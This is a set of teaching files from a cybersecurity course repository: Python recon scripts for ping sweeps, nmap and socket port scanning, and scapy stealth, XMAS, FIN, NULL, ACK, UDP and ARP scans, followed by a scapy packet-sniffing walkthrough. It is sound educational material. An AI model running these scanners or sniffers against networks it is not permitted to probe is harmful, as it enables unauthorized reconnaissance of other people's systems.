h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/scanning/basic_ping_sweep.py
# A simple script to perform a ping sweep of the # Websploit (websploit.org) containers in the # 10.6.6.0/24 network. import subprocess # Define the network to scan network = "10.6.6.0/24" # Use the 'ping' command to scan the network for i in range(1, 255): ip = "10.6.6." + str(i) result = subprocess.run(["ping", "-c", "1", "-W", "1", ip], stdout=subprocess.PIPE) if result.returncode == 0: print(ip + " is up") else: print(ip + " is down") # This script uses a for loop to iterate through all possible IP addresses in the network # (from 10.6.6.1 to 10.6.6.254) and uses the ping command to check if the host is up or down. # The -c option specifies the number of pings to send, # and the -W option specifies the timeout in seconds.
Python
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/scanning/python_nmap.py
#!/usr/bin/python # Author: Omar Santos @santosomar # version 1.0 # This is a quick demonstration on how to use the python nmap library # * Pre-requisite: nmap python library. # * Install it with pip install python-nmap ##################################################################### import sys try: import nmap except: sys.exit("[!] It looks like the nmap library is not installed in your system. You can install it with: pip install python-nmap") # The arguments to be processed if len(sys.argv) != 3: sys.exit("Please provide two arguments the first being the targets the second the ports") addr = str(sys.argv[1]) port = str(sys.argv[2]) # the scanner part my_scanner = nmap.PortScanner() my_scanner.scan(addr, port) for host in my_scanner.all_hosts(): if not my_scanner[host].hostname(): print("Not able to find the hostname for IP address %s") % (host) else: print("The hostname for IP address %s is %s") % (host, my_scanner[host].hostname()) #this prints the results of the scan in a csv file. print(my_scanner.csv())
Python
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/scanning/quick_scanner.py
#!/usr/bin/python # Author: Omar Santos @santosomar # version 1.0 # This is a quick demonstration on how to create a # basic TCP port scanner using python. ##################################################################### from __future__ import print_function import socket, subprocess, sys try: raw_input # Python 2 except NameError: raw_input = input # Python 3 subprocess.call('clear', shell=True) print('''\t ##################### OMAR'S QUICK SCANNER ##################### ''') target_ip = raw_input("\t Please enter the IP address of the target host:").strip() port_1 = int(raw_input("\t Enter the first port to scan:\t").strip()) port_2 = int(raw_input("\t Enter the last port to scan:\t").strip()) print("~"*50) print("\n ...scanning target now. ", target_ip) print("~"*50) try: for port in range(port_1, port_2): sock= socket.socket(socket.AF_INET, socket.SOCK_STREAM) socket.setdefaulttimeout(1) result = sock.connect_ex((target_ip, port)) if result==0: print("Found open port:\t", port) sock.close() except KeyboardInterrupt: print("[!] Scan stopped by user... ") sys.exit() except socket.gaierror: print("[!] The target's hostname could not be resolved...") sys.exit() except socket.error: print("[!] Target is unreachable...") sys.exit() print("The scan is complete. Happy hacking!")
Python
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/scanning/scapscan.py
#!/usr/bin/python """ Author: Omar Santos @santosomar version 1.0 This is a quick demonstration on how to use the scapy as a scanner * Pre-requisite: scapy, prettytable, argparse """ from __future__ import print_function import sys import prettytable import argparse import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #This is supress scapy warnings from scapy.all import * #conf.iface='eth0' # network interface to use conf.verb=0 # enable verbose mode - Is this actually working? conf.nofilter=1 def tcp_connect_scan(dst_ip,dst_port,dst_timeout): src_port = RandShort() tcp_connect_scan_resp = sr1(IP(dst=dst_ip)/TCP(sport=src_port,dport=dst_port,flags="S"),timeout=dst_timeout) if(str(type(tcp_connect_scan_resp))=="<type 'NoneType'>"): return "Closed" elif(tcp_connect_scan_resp.haslayer(TCP)): if(tcp_connect_scan_resp.getlayer(TCP).flags == 0x12): send_rst = sr(IP(dst=dst_ip)/TCP(sport=src_port,dport=dst_port,flags="AR"),timeout=dst_timeout) return "Open" elif (tcp_connect_scan_resp.getlayer(TCP).flags == 0x14): return "Closed" else: return "CHECK" def stealth_scan(dst_ip,dst_port,dst_timeout): src_port = RandShort() stealth_scan_resp = sr1(IP(dst=dst_ip)/TCP(sport=src_port,dport=dst_port,flags="S"),timeout=dst_timeout) if(str(type(stealth_scan_resp))=="<type 'NoneType'>"): return "Filtered" elif(stealth_scan_resp.haslayer(TCP)): if(stealth_scan_resp.getlayer(TCP).flags == 0x12): send_rst = sr(IP(dst=dst_ip)/TCP(sport=src_port,dport=dst_port,flags="R"),timeout=dst_timeout) return "Open" elif (stealth_scan_resp.getlayer(TCP).flags == 0x14): return "Closed" elif(stealth_scan_resp.haslayer(ICMP)): if(int(stealth_scan_resp.getlayer(ICMP).type)==3 and int(stealth_scan_resp.getlayer(ICMP).code) in [1,2,3,9,10,13]): return "Filtered" else: return "CHECK" def xmas_scan(dst_ip,dst_port,dst_timeout): xmas_scan_resp = sr1(IP(dst=dst_ip)/TCP(dport=dst_port,flags="FPU"),timeout=dst_timeout) if (str(type(xmas_scan_resp))=="<type 'NoneType'>"): return "Open|Filtered" elif(xmas_scan_resp.haslayer(TCP)): if(xmas_scan_resp.getlayer(TCP).flags == 0x14): return "Closed" elif(xmas_scan_resp.haslayer(ICMP)): if(int(xmas_scan_resp.getlayer(ICMP).type)==3 and int(xmas_scan_resp.getlayer(ICMP).code) in [1,2,3,9,10,13]): return "Filtered" else: return "CHECK" def fin_scan(dst_ip,dst_port,dst_timeout): fin_scan_resp = sr1(IP(dst=dst_ip)/TCP(dport=dst_port,flags="F"),timeout=dst_timeout) if (str(type(fin_scan_resp))=="<type 'NoneType'>"): return "Open|Filtered" elif(fin_scan_resp.haslayer(TCP)): if(fin_scan_resp.getlayer(TCP).flags == 0x14): return "Closed" elif(fin_scan_resp.haslayer(ICMP)): if(int(fin_scan_resp.getlayer(ICMP).type)==3 and int(fin_scan_resp.getlayer(ICMP).code) in [1,2,3,9,10,13]): return "Filtered" else: return "CHECK" def null_scan(dst_ip,dst_port,dst_timeout): null_scan_resp = sr1(IP(dst=dst_ip)/TCP(dport=dst_port,flags=""),timeout=dst_timeout) if (str(type(null_scan_resp))=="<type 'NoneType'>"): return "Open|Filtered" elif(null_scan_resp.haslayer(TCP)): if(null_scan_resp.getlayer(TCP).flags == 0x14): return "Closed" elif(null_scan_resp.haslayer(ICMP)): if(int(null_scan_resp.getlayer(ICMP).type)==3 and int(null_scan_resp.getlayer(ICMP).code) in [1,2,3,9,10,13]): return "Filtered" else: return "CHECK" def ack_flag_scan(dst_ip,dst_port,dst_timeout): ack_flag_scan_resp = sr1(IP(dst=dst_ip)/TCP(dport=dst_port,flags="A"),timeout=dst_timeout) if (str(type(ack_flag_scan_resp))=="<type 'NoneType'>"): return "Stateful firewall present\n(Filtered)" elif(ack_flag_scan_resp.haslayer(TCP)): if(ack_flag_scan_resp.getlayer(TCP).flags == 0x4): return "No firewall\n(Unfiltered)" elif(ack_flag_scan_resp.haslayer(ICMP)): if(int(ack_flag_scan_resp.getlayer(ICMP).type)==3 and int(ack_flag_scan_resp.getlayer(ICMP).code) in [1,2,3,9,10,13]): return "Stateful firewall present\n(Filtered)" else: return "CHECK" def window_scan(dst_ip,dst_port,dst_timeout): window_scan_resp = sr1(IP(dst=dst_ip)/TCP(dport=dst_port,flags="A"),timeout=dst_timeout) if (str(type(window_scan_resp))=="<type 'NoneType'>"): return "No response" elif(window_scan_resp.haslayer(TCP)): if(window_scan_resp.getlayer(TCP).window == 0): return "Closed" elif(window_scan_resp.getlayer(TCP).window > 0): return "Open" else: return "CHECK" def udp_scan(dst_ip,dst_port,dst_timeout): udp_scan_resp = sr1(IP(dst=dst_ip)/UDP(dport=dst_port),timeout=dst_timeout) if (str(type(udp_scan_resp))=="<type 'NoneType'>"): retrans = [] for count in range(0,3): retrans.append(sr1(IP(dst=dst_ip)/UDP(dport=dst_port),timeout=dst_timeout)) for item in retrans: if (str(type(item))!="<type 'NoneType'>"): udp_scan(dst_ip,dst_port,dst_timeout) return "Open|Filtered" elif (udp_scan_resp.haslayer(UDP)): return "Open" elif(udp_scan_resp.haslayer(ICMP)): if(int(udp_scan_resp.getlayer(ICMP).type)==3 and int(udp_scan_resp.getlayer(ICMP).code)==3): return "Closed" elif(int(udp_scan_resp.getlayer(ICMP).type)==3 and int(udp_scan_resp.getlayer(ICMP).code) in [1,2,9,10,13]): return "Filtered" else: return "CHECK" def start(your_target,your_ports,your_timeout): x = prettytable.PrettyTable(["Port No.","TCP Connect Scan","Stealth Scan","XMAS Scan","FIN Scan","NULL Scan", "ACK Flag Scan", "Window Scan", "UDP Scan"]) x.align["Port No."] = "l" user_dst_ip = your_target port_list = your_ports user_dst_timeout = your_timeout print("[+] Target : %s\n" % user_dst_ip) print("[*] Scan started\n") for i in port_list: tcp_connect_scan_res = tcp_connect_scan(user_dst_ip,int(i),int(user_dst_timeout)) stealth_scan_res = stealth_scan(user_dst_ip,int(i),int(user_dst_timeout)) xmas_scan_res = xmas_scan(user_dst_ip,int(i),int(user_dst_timeout)) fin_scan_res = fin_scan(user_dst_ip,int(i),int(user_dst_timeout)) null_scan_res = null_scan(user_dst_ip,int(i),int(user_dst_timeout)) ack_flag_scan_res = ack_flag_scan(user_dst_ip,int(i),int(user_dst_timeout)) window_scan_res = window_scan(user_dst_ip,int(i),int(user_dst_timeout)) udp_scan_res = udp_scan(user_dst_ip,int(i),int(user_dst_timeout)) x.add_row([i,tcp_connect_scan_res,stealth_scan_res,xmas_scan_res,fin_scan_res,null_scan_res,ack_flag_scan_res,window_scan_res,udp_scan_res]) print(x) print("\n[*] Scan completed\n") def banner(): bannerTxt = """ ************************************************************ #### #### ## ##### #### #### ## # # # # # # # # # # # # # # ## # #### # # # # # #### # # # # # # # # ###### ##### # # ###### # # # # # # # # # # # # # # # # # ## #### #### # # # #### #### # # # # A demonstration by Omar Santos on how to use scapy for scanning purposes. Part of the Cybersecurity classes at: https://h4cker.org This tool supports TCP Connect Scans, Stealth Scans, XMAS Scans, FIN Scans, NULL Scans, ACK Flag Scans, Window Scans, and UDP Scans. usage: scapy_stealth_scan.py [-h] [-p] [-pl] [-pr] [-t] target ************************************************************ """ print(bannerTxt) def main(): parser = argparse.ArgumentParser(description=banner()) parser.add_argument("target", help="Target address") parser.add_argument("-p", metavar="", help="Single port e.g. 80") parser.add_argument("-pl", metavar="", help="Port list e.g. 21,22,80") parser.add_argument("-pr", metavar="", help="Port range e.g. 20-30") parser.add_argument("-t", metavar="", type=int, default=2, help="Timeout value (default 2)") args = parser.parse_args() target = args.target ports = [] if args.p: p = args.p ports.append(p) if args.pl: pl = (args.pl).split(",") ports += pl if args.pr: pr = (args.pr).split("-") pr.sort() pr_item1 = int(pr[0]) pr_item2 = int(pr[1])+1 new_pr = range(pr_item1,pr_item2,1) ports += new_pr timeout = int( args.t) if(not len(ports)>0): print("No ports specified.\nUse -h or --help to see the help menu") exit(0) ports = list(set(ports)) new_ports=[] for item in ports: new_ports.append(int(item)) ports = new_ports ports.sort() start(target,ports,timeout) if __name__ == "__main__": main()
Markdown
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/scanning/scapy_basic_scanner.md
# Using Scapy to Scan a System The following is an example of a Python script that uses Scapy to perform a basic TCP port scan: ```python from scapy.all import * import sys def tcp_port_scan(target, ports): for port in ports: tcp_packet = IP(dst=target) / TCP(dport=port, flags="S") response = sr1(tcp_packet, timeout=2, verbose=0) if response is not None and response[TCP].flags == 18: print(f"Port {port} is open on {target}") else: print(f"Port {port} is closed on {target}") if __name__ == "__main__": target = sys.argv[1] ports = range(1, 1024) tcp_port_scan(target, ports) ``` Here's how to use the script: 1. Save the script in a file named `port_scan.py`. 2. Run the script by using the following command in the terminal: ``` python port_scan.py <target_ip> ``` Remember to replace `<target_ip>` with the IP address of the target machine. ## Detailed Explanation - The script begins by importing necessary modules: - `from scapy.all import *` imports all necessary components from the Scapy library, a powerful interactive packet manipulation tool. - `import sys` imports the system-specific parameters and functions module. - The `tcp_port_scan(target, ports)` function is defined to perform the TCP port scan: - For each port in the provided ports, it creates a TCP packet with the `S` (SYN) flag set using `IP(dst=target) / TCP(dport=port, flags="S")`. - The script then sends the packet to the target machine using the `sr1()` function, which sends the packet and returns the first response received. - If a response is received (`response is not None`) and the TCP flags of the response are equal to 18 (`response[TCP].flags == 18`), the script prints that the port is open. TCP flag 18 represents `SYN/ACK` packet which is usually the response to our SYN packet when a port is open. If there is no response or the response is not `SYN/ACK`, the script prints that the port is closed. - In the `__main__` part of the script: - `target` is set to the first argument given in the command line (`sys.argv[1]`), which is the IP address of the target machine. - `ports` is set to the range of 1-1023, which are the well-known port numbers. - The `tcp_port_scan()` function is then called with the `target` and `ports` as parameters. This is a simple script and does not handle many edge cases. In a real-world situation, additional code would be required to handle potential exceptions, timeouts, and other situations.
Python
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/scanning/simple_scapy_scan.py
import argparse from scapy.all import * def arp_scan(ip): """ Network scanning using ARP requests to an IP address or a range of IP addresses. Args: ip (str): An IP address or IP address range to scan. For example: - 192.168.88.1 to scan a single IP address - 192.168.88.1/24 to scan a range of IP addresses. Returns: A list of dictionaries mapping IP addresses to MAC addresses. For example: [ {'IP': '192.168.88.1', 'MAC': 'D3:4D:B3:3F:88:99'} ] """ request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip) ans, unans = srp(request, timeout=2, retry=1) result = [] for sent, received in ans: result.append({'IP': received.psrc, 'MAC': received.hwsrc}) return result def tcp_scan(ip, ports): """ TCP SYN scanning. Args: ip (str): An IP address or hostname to target. ports (list or tuple of int): A list or tuple of ports to scan. Returns: A list of ports that are open. """ try: syn = IP(dst=ip) / TCP(dport=ports, flags="S") except socket.gaierror: raise ValueError('Hostname {} could not be resolved.'.format(ip)) ans, unans = sr(syn, timeout=2, retry=1) result = [] for sent, received in ans: if received[TCP].flags == "SA": result.append(received[TCP].sport) return result def main(): parser = argparse.ArgumentParser() subparsers = parser.add_subparsers( dest="command", help="Command to perform.", required=True ) arp_subparser = subparsers.add_parser( 'ARP', help='Perform a network scan using ARP requests.' ) arp_subparser.add_argument( 'IP', help='An IP address (e.g. 192.168.88.1) or address range (e.g. 192.168.88.0/24) to scan.' ) tcp_subparser = subparsers.add_parser( 'TCP', help='Perform a TCP scan using SYN packets.' ) tcp_subparser.add_argument('IP', help='An IP address or hostname to target.') tcp_subparser.add_argument( 'ports', nargs='+', type=int, help='Ports to scan, delimited by spaces. When --range is specified, scan a range of ports. Otherwise, scan individual ports.' ) tcp_subparser.add_argument( '--range', action='store_true', help='Specify a range of ports. When this option is specified, <ports> should be given as <low_port> <high_port>.' ) args = parser.parse_args() if args.command == 'ARP': result = arp_scan(args.IP) for mapping in result: print('{} ==> {}'.format(mapping['IP'], mapping['MAC'])) elif args.command == 'TCP': if args.range: ports = tuple(args.ports) else: ports = args.ports try: result = tcp_scan(args.IP, ports) except ValueError as error: print(error) exit(1) for port in result: print('Port {} is open.'.format(port)) if __name__ == '__main__': main()
Markdown
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/sniffing_packet_capturing/another_scapy_sniffer_walkthrough.md
# Simple Scapy Packet Capture Here is a Python script that uses the Scapy library to capture a packet: ``` from scapy.all import * # Define a callback function def packet_callback(packet): print(packet.show()) # Use the sniff() function to capture packets sniff(prn=packet_callback, filter="tcp", count=1) ``` This script uses the `sniff()` function from Scapy to capture packets. The `prn` argument is set to a callback function, `packet_callback`, which is called for each packet captured. The filter argument is set to "tcp" to capture only TCP packets, and the count argument is set to 1 to stop capturing after the first packet is captured. The `show()` function is used to display the packet information. You can also use `filter` to capture specific IP or port. ``` sniff(prn=packet_callback, filter="tcp and host 10.1.1.2 and port 80", count=1) ``` It's important to note that capturing packets may require root/admin permissions. ## Saving to a pcap file Here is a modified version of the script that saves the captured packets to a pcap file: ``` from scapy.all import * # Define a callback function def packet_callback(packet): print(packet.show()) wrpcap("captured_packets.pcap", packet, append=True) # Use the sniff() function to capture packets sniff(prn=packet_callback, filter="tcp", count=1) ``` This script uses the `wrpcap()` function from Scapy to save the captured packets to a `pcap` file named "captured_packets.pcap". The `append=True` argument is used to append the packets to the file instead of overwriting it. ## Reading pcap files and manipulating the packets Here is a Python script that uses the Scapy library to read a pcap file and import it: ``` from scapy.all import * # read the pcap file packets = rdpcap("captured_packets.pcap") # iterate through the packets for packet in packets: print(packet.show()) ``` This script uses the `rdpcap()` function from Scapy to read the pcap file named "captured_packets.pcap" and store it in the packets variable. The packets are then iterated through using a for loop, and the `show()` function is used to display the packet information. You can also use `ls()` function to list out the layers of the packet. ``` for packet in packets: print(packet.ls()) ``` It's also possible to filter the packets based on specific layer or field. ``` # filter packets based on destination IP filtered_packets = [p for p in packets if p.haslayer(IP) and p[IP].dst == "10.1.1.2"] ``` It's important to note that this script assumes that the pcap file is in the same directory as the script, and the file name is "captured_packets.pcap".